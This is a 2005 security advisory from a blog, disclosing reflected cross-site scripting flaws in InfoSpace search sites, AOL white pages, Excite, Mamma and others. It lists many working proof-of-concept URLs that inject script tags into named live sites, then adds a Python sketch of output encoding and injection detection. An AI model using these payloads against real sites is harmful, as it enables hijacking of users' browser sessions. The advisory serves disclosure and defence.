by r0t,der4444,cembo,VietMafia

Thursday, December 01, 2005

InfoSpace® search engines XSS vuln.




InfoSpace search engines are vuln. to XSS attacks.

Vuln. discovered by: r0t
Date: 1 Dec. 2005
Vendor: http://www.infospaceinc.com/
Affected version: latest :) There are more than 3 types of search engines and all of them are vuln.

About Products:
InfoSpace is one of the leading online directory services providers on the Internet. Our award-winning directory sites include Switchboard® and InfoSpace®. Our online yellow page sites are designed to make it easier for users to locate businesses, people and information online, while creating optimal revenue opportunities for advertisers and listings partners, such as Verizon SuperPages, BellSouth, and Dex Media.

InfoSpace's online directory products are uniquely structured and highly interactive to help users quickly and easily locate businesses that satisfy their needs. Besides yellow page listings, they offer a variety of other useful services, including white pages, maps and directions, public records, and more.

InfoSpace's metasearch technology searches the most popular engines including Google, Yahoo!, MSN Search, Ask Jeeves and more, and returns the best results from each.

Metasearch
InfoSpace's branded search sites Dogpile®, WebCrawler®, MetaCrawler® and WebFetch™ make it easy to search more of the Web and find relevant results fast.

By combining the relevancy weightings of multiple engines, InfoSpace metasearch returns the best results the Web has to offer, providing users with a more powerful and comprehensive way to search. In short, metasearch allows users to search up to 50% more of the Web than any single engine.

Because metasearch aggregates results including paid advertising from several sources, each of InfoSpace's branded search sites are better able to monetize search than any single search engine.



Vuln. Description:

Input passed to InfoSpace search engine parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.


Example of InfoSpace Search engines:

http://msxml.webcrawler.com/info.wbcrwl/search/
web/%253Cscript%253Ealert(%2527r0t%252Blloves%2
52BXSS%2527)%253C%252Fscript253E/1/-/1/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/
top

http://www.metacrawler.com/info.metac/search/web
/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2
527)%253C%252Fscript253E/1/-/1/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.dogpile.com/info.dogpl/search/web/%253
Cscript%253Ealert(%2527r0t%252Blloves%252BXSS%252
7)%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.webfetch.com/uk.webfetch/search/web/%2
53Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2527)
%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/417/top?engineset=uk-onl
y_oando



http://www.switchboard.com/bin/cgiqa.dll?SR=&MEM=1
&QV=24F925BAB8114FE185F3F69AD09FD7A0l02811611743C8
74343313203O01811711743C87434D313203O03872D3DA93C8
74316303203&LNK=14%3A21&F=&L=%3Cscript%3Ealert%28%
27r0t+love+XSS%27%29%3C%2Fscript%3E&T=&S=&Z=&image
1.x=24&image1.y=9


Example in AOL:

http://whitepages.aol.com/_1_2LJMU7R09YLVHU__aolwp.aolw/
white-pages/noresults.htm?kcfg=wpus&otmpl=%2Fwhite-pages
%2Fresults.htm&qfm=n&qk=5&top=internal&qname=%3Cscript%3
Ealert%28%27r0t%2Blove%2BXSS%27%29%3C%2Fscript%3E&qs=&se
archtype=citystate&qn=%3Cscript%3Ealert('r0t+love+XSS')
%3C/script%3E&qf=&qc=

Example on Excite.com
http://msxml.excite.com/info.xcite/search/web/%253Cscript
%253Ealert(%2527r0t%2Blloves%2BXSS%2527)%253C%252Fscript%
253E

Other examples:
http://www.webmarket.com/info.webmkt/results.htm?qkw=%3Cs
cript%3Ealert%28%27r0t%2Blloves%2BXSS%27%29%3C%2Fscript%3E

http://www.classifieds2000.com/_1_W1U7R0GZW8ML__info.cls2k
/classads/results.htm?qkw=%3Cscript%3Ealert%28%27r0t%2Bllo
ves%2BXSS%27%29%3C%2Fscript%3E

http://msxml.infospace.com/_1_2N6MU7R09I3ROK__info.nbci/se
arch/web/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%252
7)%253C%252Fscript%253E



Mamma.com is only a partner of InfoSpace, yet it also has the same type of vuln.

example:

http://www.mamma.com/Mamma?qtype=&query=%3Cscript%3
Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E


Solution:
Edit the source code to ensure that input is properly sanitised.
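
A sketch of that fix, added here as an example (it is not InfoSpace code and not part of the original advisory): the search term is HTML-encoded at output time, so it no longer matters how many percent-encoding layers were removed before it reached the page. The function names, the "Results for" fragment and the decode-until-stable model are assumptions; the sample term is the double-encoded string from the Dogpile URL above.

```python
import html
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumed cap on nested percent-encoding layers

# Search term copied from the Dogpile example URL in this advisory.
SAMPLE_TERM = ("%253Cscript%253Ealert(%2527r0t%252Blloves%252BXSS%2527)"
               "%253C%252Fscript%253E")

def decode_fully(raw):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    text, rounds = raw, 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def render_unsafe(term):
    """Stand-in for the flaw described: decoded input echoed verbatim."""
    text, _ = decode_fully(term)
    return f"<p>Results for: {text}</p>"

def render_safe(term):
    """Same fragment, with the term HTML-encoded when it is written out."""
    text, _ = decode_fully(term)
    return f"<p>Results for: {html.escape(text, quote=True)}</p>"

def looks_like_markup_injection(term):
    """Log-review helper: markup characters that appear only after decoding."""
    text, rounds = decode_fully(term)
    return rounds >= 1 and any(c in text for c in "<>\"'")

if __name__ == "__main__":
    print(decode_fully(SAMPLE_TERM))
    print(render_unsafe(SAMPLE_TERM))
    print(render_safe(SAMPLE_TERM))
    print(looks_like_markup_injection(SAMPLE_TERM))
```

The sample term needs two decoding rounds before the markup appears, which is why a filter that inspects the value after only one decode misses it while encoding at output does not.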

1 Comments:

Anonymous w00t told...

Great find!

1:01 PM

 


 
Copyright (c) 2006 Pridels Sec Crew